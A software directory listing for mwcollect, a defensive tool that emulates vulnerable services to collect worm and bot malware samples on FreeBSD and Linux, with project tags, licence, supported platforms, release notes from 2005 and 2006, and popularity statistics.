mwcollect
mwcollect is an easy solution to collect worm-like malware in a non-native environment like FreeBSD or Linux. The first versions were used to collect binaries for botnet monitoring, and bots are still what it is mostly collecting. Some people consider it a next generation honeypot; however, that comparison often leads to the misunderstanding that computers running mwcollect can actually be infected with the malware, which is not the case.
| Tags | Networking Monitoring |
|---|---|
| Licenses | BSD Original |
| Operating Systems | POSIX BSD FreeBSD Linux Windows Windows Cygwin |
| Implementation | C C++ |
Recent releases
- 02 Feb 2006 13:37
Release Notes: This release adds a submit-gotek submission module, fixes some bugs in the timeout code, and builds cleanly under FreeBSD.
- 17 Dec 2005 21:32
Release Notes: A vuln-ms0551 module (tcp/1025 MSDTC action; Dasher.A-C) was added. Shell parsing was improved. Fixes were made regarding startup file permissions. Various bugfixes were made. Other changes were done.
- 05 Dec 2005 06:44
Release Notes: This release fixes some minor bugs, adds two shellcode parsers and a new parsing engine for FTP instruction files, and, most importantly, introduces approved Prelude IDS compatibility to mwcollect.
- 30 Oct 2005 11:06
Release Notes: This version is a complete rewrite from the scratch. The network core now supports mulitple (vulnerability) modules per port and is much more mature and stable in general. This release is the step from the proof-of-concept toy to a real mature project.
- 23 Sep 2005 05:39
Release Notes: Some minor usage bugs were fixed. A major DoS security bug in PCRE usage was fixed.
oxff
11 May 2005 06:31
Heartbeat
- Popularity Score
- 52.46
- Vitality Score
- 2.97
- Subscriptions
- 15
